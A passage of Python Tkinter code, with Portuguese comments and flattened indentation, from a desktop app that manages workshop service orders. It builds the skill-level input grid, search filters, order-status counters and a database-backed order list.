self.box1 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box2 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box3 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box4 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box5 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box6 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box7 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box8 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box9 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box10 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box11 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box12 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box13 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box14 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box15 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box16 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box17 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box18 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box19 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box20 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box21 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box22 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box23 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box24 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box25 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box26 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box27 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box28 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box29 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box30 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box31 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box32 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box33 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box34 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box35 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box36 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box37 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box38 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box39 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box40 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box41 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box1.place(relx=0.190, rely=0.130, relwidth=0.06)
self.box2.place(relx=0.430, rely=0.130, relwidth=0.06)
self.box3.place(relx=0.680, rely=0.130, relwidth=0.06)
self.box4.place(relx=0.930, rely=0.130, relwidth=0.06)
self.box5.place(relx=0.190, rely=0.210, relwidth=0.06)
self.box6.place(relx=0.430, rely=0.210, relwidth=0.06)
self.box7.place(relx=0.680, rely=0.210, relwidth=0.06)
self.box8.place(relx=0.930, rely=0.210, relwidth=0.06)
self.box9.place(relx=0.190, rely=0.290, relwidth=0.06)
self.box10.place(relx=0.430, rely=0.290, relwidth=0.06)
self.box11.place(relx=0.680, rely=0.290, relwidth=0.06)
self.box12.place(relx=0.930, rely=0.290, relwidth=0.06)
self.box13.place(relx=0.190, rely=0.370, relwidth=0.06)
self.box14.place(relx=0.430, rely=0.370, relwidth=0.06)
self.box15.place(relx=0.680, rely=0.370, relwidth=0.06)
self.box16.place(relx=0.930, rely=0.370, relwidth=0.06)
self.box17.place(relx=0.190, rely=0.450, relwidth=0.06)
self.box18.place(relx=0.430, rely=0.450, relwidth=0.06)
self.box19.place(relx=0.680, rely=0.450, relwidth=0.06)
self.box20.place(relx=0.930, rely=0.450, relwidth=0.06)
self.box21.place(relx=0.190, rely=0.530, relwidth=0.06)
self.box22.place(relx=0.430, rely=0.530, relwidth=0.06)
self.box23.place(relx=0.680, rely=0.530, relwidth=0.06)
self.box24.place(relx=0.930, rely=0.530, relwidth=0.06)
self.box25.place(relx=0.190, rely=0.610, relwidth=0.06)
self.box26.place(relx=0.430, rely=0.610, relwidth=0.06)
self.box27.place(relx=0.680, rely=0.610, relwidth=0.06)
self.box28.place(relx=0.930, rely=0.610, relwidth=0.06)
self.box29.place(relx=0.190, rely=0.690, relwidth=0.06)
self.box30.place(relx=0.430, rely=0.690, relwidth=0.06)
self.box31.place(relx=0.680, rely=0.690, relwidth=0.06)
self.box32.place(relx=0.930, rely=0.690, relwidth=0.06)
self.box33.place(relx=0.190, rely=0.770, relwidth=0.06)
self.box34.place(relx=0.430, rely=0.770, relwidth=0.06)
self.box35.place(relx=0.680, rely=0.770, relwidth=0.06)
self.box36.place(relx=0.930, rely=0.770, relwidth=0.06)
self.box37.place(relx=0.190, rely=0.850, relwidth=0.06)
self.box38.place(relx=0.430, rely=0.850, relwidth=0.06)
self.box39.place(relx=0.680, rely=0.850, relwidth=0.06)
self.box40.place(relx=0.930, rely=0.850, relwidth=0.06)
self.box41.place(relx=0.190, rely=0.930, relwidth=0.06)
#Botão que confirmará os dados quando solicitado
self.imgConfirmar = PhotoImage(file='image/confirmar.png')
self.botaoConfirmar = Button(self.aba3, image=self.imgConfirmar, border=0, bg='white', activebackground='white', command=lambda:self.verificar_campos_cadastro('cadastrar'))
self.botaoConfirmar.place(relx=0.82, rely=0.90)
def aba_ordem_de_servico(self):
global img
img = PhotoImage(file='image/nova.png')
botAltribuirOS = Button(self.framePri, text='Novo O.S', image=img, compound=TOP, font=('arial', 9), bg='white', fg='black', relief=SOLID, border=0, command=self.criar_ordem_de_servico)
botAltribuirOS.place(relx=0.070, rely=0.040)
global img2
img2 = PhotoImage(file='image/alterar2.png')
botEditarOS = Button(self.framePri, text='Editar', image=img2, compound=TOP, font=('arial', 9), bg='white', fg='black', relief=SOLID, border=0)
botEditarOS.place(relx=0.160, rely=0.040)
global img3
img3 = PhotoImage(file='image/ferramenta.png')
botAlterarOS = Button(self.framePri, text='Cad. Peça', image=img3, compound=TOP, font=('arial', 9), bg='white', fg='black', relief=SOLID, border=0, command=self.janela_exibir_pecas)
botAlterarOS.place(relx=0.230, rely=0.040)
self.frameBuscar = Frame(self.framePri, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.frameBuscar.place(relx=0.060, rely=0.190, relwidth=0.880, relheight=0.180)
#Label e Combobox para escolher qual tipo de pesquisa será feita
labelPesquisar = Label(self.frameBuscar, text='Buscar por', font=('arial', 10), bg='white', fg='#344f84')
labelPesquisar.place(relx=0.060, rely=0.250)
self.boxPesquisar = ttk.Combobox(self.frameBuscar, font=('arial',10), state='readonly')
self.boxPesquisar['values'] = ('O.S', 'Cliente')
self.boxPesquisar.place(relx=0.130, rely=0.250, relwidth=0.070)
self.boxPesquisar.current(0)
#Barra de busca e botão para pesquisar
self.strCampoBusca = StringVar()
self.strCampoBusca.trace('w', self.buscar)
self.campoBusca = Entry(self.frameBuscar, font=('arial', 12), border=2, relief=GROOVE)
self.campoBusca.place(relx=0.050, rely=0.505, relwidth=0.140)
self.campoBusca.bind("<Return>", self.buscar)
self.campoBusca.focus_force()
self.imgLupa = PhotoImage(file="image/lupa.png")
botBuscar = Button(self.frameBuscar, image=self.imgLupa, bg='white', border=0, activebackground='white')
botBuscar.place(relx=0.190, rely=0.502)
#Filtrar campo de tempo
labelDateDe = Label(self.frameBuscar, text='Data de', font=('arial', 10), bg='white', fg='#344f84')
labelDateDe.place(relx=0.460, rely=0.250)
dia = Entry(self.frameBuscar, font=('arial',10), width=3, border=2, relief=GROOVE)
dia.place(relx=0.470, rely=0.505)
barra = Label(self.frameBuscar, text='/', font=('arial',10), bg='white', fg='#344f84')
barra.place(relx=0.497, rely=0.505)
mes = Entry(self.frameBuscar, font=('arial',10), width=3, border=2, relief=GROOVE)
mes.place(relx=0.510, rely=0.505)
barra = Label(self.frameBuscar, text='/', font=('arial',10), bg='white', fg='#344f84')
barra.place(relx=0.537, rely=0.505)
ano = Entry(self.frameBuscar, font=('arial',10), width=5, border=2, relief=GROOVE)
ano.place(relx=0.547, rely=0.505)
labelDateDe = Label(self.frameBuscar, text='Até', font=('arial', 10), bg='white', fg='#344f84')
labelDateDe.place(relx=0.660, rely=0.250)
dia2 = Entry(self.frameBuscar, font=('arial',10), width=3, border=2, relief=GROOVE)
dia2.place(relx=0.670, rely=0.505)
barra = Label(self.frameBuscar, text='/', font=('arial',10), bg='white', fg='#344f84')
barra.place(relx=0.697, rely=0.505)
mes2 = Entry(self.frameBuscar, font=('arial',10), width=3, border=2, relief=GROOVE)
mes2.place(relx=0.710, rely=0.505)
barra = Label(self.frameBuscar, text='/', font=('arial',10), bg='white', fg='#344f84')
barra.place(relx=0.737, rely=0.505)
ano2 = Entry(self.frameBuscar, font=('arial',10), width=5, border=2, relief=GROOVE)
ano2.place(relx=0.747, rely=0.505)
#Frame onde ficará contagens de Retrabalhos do dia
self.frameTotUrgente = Frame(self.framePri, highlightbackground='white', highlightthickness=2, bg='white')
self.frameTotUrgente.place(relx=0.550, rely=0.020, relwidth=0.120, relheight=0.150)
labelTitle1 = Label(self.frameTotUrgente, text='Urgente', bg='white', fg='red', font=('arial', 13, 'bold'))
labelTitle1.place(relx=0.5, rely=0.150, relheight=0.210, anchor='center')
lbOSUrgente = Label(self.frameTotUrgente, bg='white', fg='red', font=('arial', 25, 'bold'))
lbOSUrgente.place(relx=0.5, rely=0.5, anchor="center")
labelHoje = Label(self.frameTotUrgente, text='Total', bg='white', fg='red', font=('arial', 10, 'bold'))
labelHoje.place(relx=0.5, rely=0.800, anchor='center')
#Criando balão de mensagem
balao_info = tix.Balloon(self.aba4, bg='#e6f9ff')
balao_info.bind_widget(self.frameTotUrgente, balloonmsg='Número de O.S aberta com urgência.')
#Configurando cores de fundo do balão
balao_info.subwidgets_all()[1].config(bg='#e6f9ff')
balao_info.subwidgets_all()[2].config(bg='#e6f9ff')
balao_info.subwidgets_all()[3].config(bg='#e6f9ff')
balao_info.subwidgets_all()[4].config(bg='#e6f9ff')
#Removendo seta padrão do balão de mensagem
balao_info.subwidget('label')['image'] = BitmapImage()
self.dataHoje = datetime.now().date()
try:
self.cursor.execute("select count(*) from ordem_servico where TipoOS = 'Urgente' and Estado = 'Aberto'")
lbOSUrgente['text'] = self.cursor.fetchall()[0][0]
except:
pass
#Frame onde ficará contagens de Operações do dia
self.frameTotAtrasada = Frame(self.framePri, highlightbackground='white', highlightthickness=2, bg='white')
self.frameTotAtrasada.place(relx=0.700, rely=0.020, relwidth=0.120, relheight=0.150)
labelTitle1 = Label(self.frameTotAtrasada, text='Atrasadas', bg='white', fg='yellow', font=('arial', 13, 'bold'))
labelTitle1.place(relx=0.5, rely=0.150, relheight=0.210, anchor='center')
lbOSAtrada = Label(self.frameTotAtrasada, bg='white', fg='yellow', font=('arial', 25, 'bold'))
lbOSAtrada.place(relx=0.5, rely=0.5, anchor="center")
labelHoje = Label(self.frameTotAtrasada, text='Total', bg='white', fg='yellow', font=('arial', 10, 'bold'))
labelHoje.place(relx=0.5, rely=0.800, anchor='center')
#Criando balão de mensagem
balao_info = tix.Balloon(self.aba4, bg='#e6f9ff')
balao_info.bind_widget(self.frameTotAtrasada, balloonmsg='Número de O.S aberta com atrasos.')
#Configurando cores de fundo do balão
balao_info.subwidgets_all()[1].config(bg='#e6f9ff')
balao_info.subwidgets_all()[2].config(bg='#e6f9ff')
balao_info.subwidgets_all()[3].config(bg='#e6f9ff')
balao_info.subwidgets_all()[4].config(bg='#e6f9ff')
#Removendo seta padrão do balão de mensagem
balao_info.subwidget('label')['image'] = BitmapImage()
try:
self.cursor.execute("select count(*) from ordem_servico where DataPrevista < '"+str(self.dataHoje)+"' and Estado = 'Aberto'")
lbOSAtrada['text'] = self.cursor.fetchall()[0][0]
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
#Frame onde ficará contagens de OS
self.frameTotPrazo = Frame(self.framePri, highlightbackground='white', highlightthickness=2, bg='white')
self.frameTotPrazo.place(relx=0.840, rely=0.020, relwidth=0.120, relheight=0.150)
labelTitle1 = Label(self.frameTotPrazo, text='No Prazo', bg='white', fg='#32cd32', font=('arial', 13, 'bold'))
labelTitle1.place(relx=0.5, rely=0.150, relheight=0.210, anchor='center')
lbOSPrazo = Label(self.frameTotPrazo, bg='white', fg='#32cd32', font=('arial', 25, 'bold'))
lbOSPrazo.place(relx=0.5, rely=0.5, anchor="center")
labelTotal = Label(self.frameTotPrazo, text='Total', bg='white', fg='#32cd32', font=('arial', 10, 'bold'))
labelTotal.place(relx=0.5, rely=0.800, anchor='center')
#Criando balão de mensagem
balao_info = tix.Balloon(self.aba4, bg='#e6f9ff')
balao_info.bind_widget(self.frameTotPrazo, balloonmsg='Número de O.S aberta dentro da data estipulada.')
#Configurando cores de fundo do balão
balao_info.subwidgets_all()[1].config(bg='#e6f9ff')
balao_info.subwidgets_all()[2].config(bg='#e6f9ff')
balao_info.subwidgets_all()[3].config(bg='#e6f9ff')
balao_info.subwidgets_all()[4].config(bg='#e6f9ff')
#Removendo seta padrão do balão de mensagem
balao_info.subwidget('label')['image'] = BitmapImage()
try:
#Consultando no banco de dados as O.S Pausada de modo distintas
self.cursor.execute("select count(*) from ordem_servico where DataPrevista >= '"+str(self.dataHoje)+"' and Estado = 'Aberto'")
lbOSPrazo['text'] = self.cursor.fetchall()[0][0]
except: pass
labelTitle1 = Label(self.framePri, text='Ordem de Serviço', bg='white', fg='grey', font=('arial', 13))
labelTitle1.place(relx=0.060, rely=0.403)
#Frame onde ficará os resultado das buscas feitas ao Banco de Dados
self.frameDados = Frame(self.framePri, highlightbackground='#e6e6e6', highlightcolor='white', highlightthickness=1, bg='white')
self.frameDados.place(relx=0.060, rely=0.450, relwidth=0.880, relheight=0.530)
#Posiçãao estática para classificação das colunas
self.sinal = 0
#Tree view onde exibirá as Ordem de Serviços
self.OrdemServico = ttk.Treeview(self.frameDados, column=('1','2','3','4','5','6','7','8'), show='headings')
'''
self.OrdemServico.heading('1', text='ID')
self.OrdemServico.heading('2', text='Ordem de Serviço')
self.OrdemServico.heading('3', text='Data de Abertura')
self.OrdemServico.heading('4', text='Nº de Peça')
self.OrdemServico.heading('5', text='Operações Realizada')
self.OrdemServico.heading('6', text='Retrabalhos')
self.OrdemServico.heading('7', text='Total de Horas')
'''
self.OrdemServico.heading('1', text='ID')
self.OrdemServico.heading('2', text='OS')
self.OrdemServico.heading('3', text='Cliente')
self.OrdemServico.heading('4', text='Produto')
self.OrdemServico.heading('5', text='QTDE')
self.OrdemServico.heading('6', text='Tipo/OS')
self.OrdemServico.heading('7', text='Data Prevista')
self.OrdemServico.heading('8', text='Situação')
self.OrdemServico.column("1", width=1, anchor='n')
self.OrdemServico.column("2", width=100, anchor='n')
self.OrdemServico.column("3", width=200, anchor='n')
self.OrdemServico.column("4", width=200, anchor='n')
self.OrdemServico.column("5", width=50, anchor='n')
self.OrdemServico.column("6", width=100, anchor='n')
self.OrdemServico.column("7", width=100, anchor='n')
self.OrdemServico.column("8", width=100, anchor='n')
self.OrdemServico.place(relx=0, rely=0, relwidth=0.975, relheight=0.999)
self.OrdemServico.bind("<Double-1>", self.exibir_toplevel_inicio)
self.OrdemServico.bind("<Return>", self.exibir_toplevel_inicio)
self.OrdemServico.bind("<Escape>", lambda event: self.remover_focus(event, self.OrdemServico))
scrollbar = Scrollbar(self.frameDados, orient="vertical", command=self.OrdemServico.yview)
self.OrdemServico.configure(yscrollcommand=scrollbar.set)
scrollbar.place(relx=0.975, rely=0, relwidth=0.025, relheight=0.999)
self.cursor.execute("select a.id, a.OS, a.Cliente, a.Produto, a.QTDE, a.TipoOS, a.DataPrevista, a.Estado from ordem_servico as a")
osBuscada = self.cursor.fetchall()
for os in osBuscada:
self.OrdemServico.insert("", "end", values=(os[0], os[1], os[2], os[3], os[4], os[5], os[6], os[7]))
'''
try:
#Consultando no banco de dados as O.S finalizadas de modo distintas
self.cursor.execute("select OS, id, DataAberta, Peca from ordem_processo group by OS order by id asc")
osDistintas = self.cursor.fetchall()
#Para cada linha de O.S selecionada, irá armazenar as colunas nas segintes variáveis
for os in osDistintas:
self.cursor.execute("select id, DataInicial from concluidas where OS ="+str(os[0])+" limit 1")
linha = self.cursor.fetchall()
self.cursor.execute("select count(*) from concluidas where OS ="+str(os[0]))
contagemOperacoes = self.cursor.fetchall()
self.cursor.execute("select count(*) from concluidas where Tipo = 'Retrabalhar OS' and OS = "+str(os[0]))
contagemRetrabalho = self.cursor.fetchall()
self.cursor.execute("select count(Peca) from ordem_processo where OS = '"+str(os[0])+"' and Peca = '"+str(os[3])+"' group by Peca order by id asc")
nPecas = self.cursor.fetchall()
#extraindo do banco de dados as informações e armazenando nas variáveis
ID = os[1]
if osDistintas == []:
dataAberta = 'Não Disponível'
nPecas = 'Não Disponível'
else:
dataAberta = os[2].strftime('%d/%m/%Y às %H:%M:%S')
#Consulta SQL a ser feita por parametro
SQL = ("select TempGasto, TempGastoExt from concluidas where OS = "+str(os[0]))
horaTotal = self.somar_total_horas_gastas_os(SQL, 2)
#Adicionando as colunas da respectiva O.S na Treeview
self.OrdemServico.insert("", "end", values=(ID, os[0], dataAberta, nPecas, contagemOperacoes, contagemRetrabalho, horaTotal))
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
'''
def exibir_habilidade(self):
self.janelaHabilidade = Toplevel()
self.centraliza_tela(900, 500, self.janelaHabilidade)
selecionada = self.viewFuncionarios.selection()[0]
x = self.viewFuncionarios.item(selecionada, "values")
idd = x[0]
frame = Frame(self.janelaHabilidade, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
frame.place(relx=0.050, rely=0.200, relwidth=0.900, relheight=0.650)
linhaCabecario = Label(frame, bg='black', fg='white', text='Niveis Funcionário', font=('arial',12,'bold'))
linhaCabecario.place(relx=0, rely=0, relwidth=1, relheight=0.080)
lbHabilidade1 = Label(frame, text='Desenhar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade2 = Label(frame, text='Revisar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade3 = Label(frame, text='Serrar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade4 = Label(frame, text='Furar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade5 = Label(frame, text='Estampar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade6 = Label(frame, text='Prensar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade7 = Label(frame, text='Rosquear', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade8 = Label(frame, text='Tornear 1º', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade9 = Label(frame, text='Tornear 2º', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade10 = Label(frame, text='Tornear Única', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade11 = Label(frame, text='Fresar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade12 = Label(frame, text='Retificar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade13 = Label(frame, text='Erosão Penetração', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade14 = Label(frame, text='Erosão Fio', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade15 = Label(frame, text='Tratamento Térmico', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade16 = Label(frame, text='Oxidação Negra', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade17 = Label(frame, text='Solda', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade18 = Label(frame, text='Tornear Ponto', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade19 = Label(frame, text='Solda Indução', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade20 = Label(frame, text='Lixar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade21 = Label(frame, text='Esmerilhar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade22 = Label(frame, text='Jatear', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade23 = Label(frame, text='Polir', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade24 = Label(frame, text='Lavar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade25 = Label(frame, text='Embalar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade26 = Label(frame, text='Medir', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade27 = Label(frame, text='Rebarbar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade28 = Label(frame, text='Rosquear Manualmente', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade29 = Label(frame, text='Pintar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade30 = Label(frame, text='Montar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade31 = Label(frame, text='Escarear', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade32 = Label(frame, text='Afiar Ferramenta', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade33 = Label(frame, text='Dobrar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade34 = Label(frame, text='Chanfrar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade35 = Label(frame, text='Soldar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade36 = Label(frame, text='Cortar c/lixadeira', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade37 = Label(frame, text='Cortar c/maçarico', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade38 = Label(frame, text='Aquecer com Maçarico', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade39 = Label(frame, text='Temperar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade40 = Label(frame, text='Revenir', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade41 = Label(frame, text='Desempenar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade1.place(relx=0.020, rely=0.130, relwidth=0.180)
lbHabilidade2.place(relx=0.260, rely=0.130, relwidth=0.180)
lbHabilidade3.place(relx=0.510, rely=0.130, relwidth=0.180)
lbHabilidade4.place(relx=0.760, rely=0.130, relwidth=0.180)
lbHabilidade5.place(relx=0.020, rely=0.210, relwidth=0.180)
lbHabilidade6.place(relx=0.260, rely=0.210, relwidth=0.180)
lbHabilidade7.place(relx=0.510, rely=0.210, relwidth=0.180)
lbHabilidade8.place(relx=0.760, rely=0.210, relwidth=0.180)
lbHabilidade9.place(relx=0.020, rely=0.290, relwidth=0.180)
lbHabilidade10.place(relx=0.260, rely=0.290, relwidth=0.180)
lbHabilidade11.place(relx=0.510, rely=0.290, relwidth=0.180)
lbHabilidade12.place(relx=0.760, rely=0.290, relwidth=0.180)
lbHabilidade13.place(relx=0.020, rely=0.370, relwidth=0.180)
lbHabilidade14.place(relx=0.260, rely=0.370, relwidth=0.180)
lbHabilidade15.place(relx=0.510, rely=0.370, relwidth=0.180)
lbHabilidade16.place(relx=0.760, rely=0.370, relwidth=0.180)
lbHabilidade17.place(relx=0.020, rely=0.450, relwidth=0.180)
lbHabilidade18.place(relx=0.260, rely=0.450, relwidth=0.180)
lbHabilidade19.place(relx=0.510, rely=0.450, relwidth=0.180)
lbHabilidade20.place(relx=0.760, rely=0.450, relwidth=0.180)
lbHabilidade21.place(relx=0.020, rely=0.530, relwidth=0.180)
lbHabilidade22.place(relx=0.260, rely=0.530, relwidth=0.180)
lbHabilidade23.place(relx=0.510, rely=0.530, relwidth=0.180)
lbHabilidade24.place(relx=0.760, rely=0.530, relwidth=0.180)
lbHabilidade25.place(relx=0.020, rely=0.610, relwidth=0.180)
lbHabilidade26.place(relx=0.260, rely=0.610, relwidth=0.180)
lbHabilidade27.place(relx=0.510, rely=0.610, relwidth=0.180)
lbHabilidade28.place(relx=0.760, rely=0.610, relwidth=0.180)
lbHabilidade29.place(relx=0.020, rely=0.690, relwidth=0.180)
lbHabilidade30.place(relx=0.260, rely=0.690, relwidth=0.180)
lbHabilidade31.place(relx=0.510, rely=0.690, relwidth=0.180)
lbHabilidade32.place(relx=0.760, rely=0.690, relwidth=0.180)
lbHabilidade33.place(relx=0.020, rely=0.770, relwidth=0.180)
lbHabilidade34.place(relx=0.260, rely=0.770, relwidth=0.180)
lbHabilidade35.place(relx=0.510, rely=0.770, relwidth=0.180)
lbHabilidade36.place(relx=0.760, rely=0.770, relwidth=0.180)
lbHabilidade37.place(relx=0.020, rely=0.850, relwidth=0.180)
lbHabilidade38.place(relx=0.260, rely=0.850, relwidth=0.180)
lbHabilidade39.place(relx=0.510, rely=0.850, relwidth=0.180)
lbHabilidade40.place(relx=0.760, rely=0.850, relwidth=0.180)
lbHabilidade41.place(relx=0.020, rely=0.930, relwidth=0.180)
lbDados1 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados2 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados3 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados4 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados5 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados6 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados7 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados8 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados9 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados10 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados11 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados12 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados13 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados14 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados15 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados16 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados17 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados18 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados19 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados20 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados21 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados22 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados23 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados24 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados25 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados26 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados27 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados28 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados29 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados30 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados31 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados32 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados33 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados34 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados35 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados36 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados37 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados38 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
